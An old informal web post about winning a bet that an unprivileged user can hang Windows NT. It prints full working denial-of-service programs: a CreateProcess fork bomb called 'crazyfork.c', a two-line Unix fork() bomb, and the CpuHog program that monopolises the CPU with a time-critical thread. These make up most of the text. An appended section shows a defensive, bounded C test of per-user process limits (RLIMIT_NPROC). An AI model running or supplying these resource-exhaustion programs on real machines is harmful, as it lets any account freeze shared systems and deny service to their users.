I made a bet with some pro-NT dude that it is possible to write a few-line program which will hang NT from any account (including guest). I was not very honest, as I knew that the NT internals site, among other excellent things (well, as much as anything NT-related can be excellent...), contains such an example. To my big disappointment, I was unable to find it there now. I am afraid that this fact, as well as the site name change, as well as the reciprocal link to/from the Micro$oft site (they got some stupid "shareware price" from them), shows a very sad tendency. So I was challenged to write it myself. After all, it was a no-brainer:

/* file: crazyfork.c */
#include <windows.h>
#include <stdio.h>

void main ()
{
    STARTUPINFO si;
    SECURITY_ATTRIBUTES saProcess, saThread;
    PROCESS_INFORMATION piProcess;

    ZeroMemory (&si, sizeof(si));
    si.cb = sizeof(si);
    saProcess.nLength = sizeof(saProcess);
    saProcess.lpSecurityDescriptor = NULL;
    saProcess.bInheritHandle = TRUE;
    saThread.nLength = sizeof(saThread);
    saThread.lpSecurityDescriptor = NULL;
    saThread.bInheritHandle = FALSE;

    while (1)
    {
        if (CreateProcess(NULL, "crazyfork", &saProcess, &saThread, FALSE, 0,
                          NULL, NULL, &si, &piProcess))
        { printf ("new process created\n"); }
        else
        { printf ("unable create process\n"); }
    }
}

Works very well. The system goes into a completely unusable state. To my second big disappointment in this story,

void main ()
{
    while (1)
    { fork (); }
}

works equally well on Linux and SunOS. But I think unix shines here nevertheless - you are able to crash it in the same way with a much more elegant piece of code than in the NT case. And finally, for the benefit of mankind, the piece from NT internals (I found it after all in my download junk):

//============================================================================
// CpuHog.c
//
// Copyright (C) 1996 Mark Russinovich
//
// How vulnerable is NT? Here is a 5 line program, runnable from a
// guest account, that instantly cripples an NT system. Once started, no
// other program will run, and there is no way to stop it. No, not even
// task manager can get a shot at the CPU after CpuHog is off and running!
//============================================================================
#include <windows.h>

//---------------------------------------------------------
//
// main
//
// Set thread to highest priority allowed for programs
// that run without administrative privilege and just sit
// in a loop.
//
//---------------------------------------------------------
int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpCmdLine,
                    int nCmdShow )
{
    MessageBox( NULL, "CpuHog V1.0\nCopyright (C) 1996 Mark Russinovich\n"
                "http://www.ntinternals.com", "CpuHog", MB_OK );
    SetThreadPriority( GetCurrentThread(),
                       THREAD_PRIORITY_TIME_CRITICAL );
    while(1);
    // never get here
    return 0;
}
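
For the fork() loop above, the standard Unix countermeasure is a per-user process limit, which makes the kernel refuse further fork() calls with EAGAIN instead of filling the process table. The following is an added example, not part of the original page: the function names, the cap of 16 and the burst of 64 are assumptions chosen for illustration, and the burst is bounded so the program always terminates.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Lower the soft per-UID process limit to max_procs (clamped to the hard
 * limit). Returns the soft limit now in force, or -1 on error. */
long cap_nproc(rlim_t max_procs)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NPROC, &rl) != 0) return -1;
    if (max_procs > rl.rlim_max) max_procs = rl.rlim_max;
    rl.rlim_cur = max_procs;
    if (setrlimit(RLIMIT_NPROC, &rl) != 0) return -1;
    if (getrlimit(RLIMIT_NPROC, &rl) != 0) return -1;
    return (long)rl.rlim_cur;
}

/* In a sandbox child, apply the cap and make `attempts` (< 255) fork() calls
 * whose children exit at once: a bounded stand-in for the endless loop.
 * Returns how many calls the kernel refused with EAGAIN, or -1 on failure. */
int refused_forks(rlim_t max_procs, int attempts)
{
    pid_t sandbox = fork();
    if (sandbox < 0) return -1;
    if (sandbox == 0) {
        int refused = 0;
        if (cap_nproc(max_procs) < 0) _exit(255);
        for (int i = 0; i < attempts; i++) {
            pid_t p = fork();
            if (p == 0) _exit(0);            /* grandchild does nothing */
            if (p < 0 && errno == EAGAIN) refused++;
        }
        while (wait(NULL) > 0) { }           /* unreaped children counted until here */
        _exit(refused);
    }
    int status;
    if (waitpid(sandbox, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status) == 255 ? -1 : WEXITSTATUS(status);
}

int main(void)
{
    printf("fork() calls refused under cap: %d of 64\n", refused_forks(16, 64));
    return 0;
}
```

The count depends on how many processes the calling user already owns, because RLIMIT_NPROC is accounted per real UID. On Linux the limit is not enforced for root or for processes holding CAP_SYS_RESOURCE or CAP_SYS_ADMIN, so a privileged run reports 0 refusals.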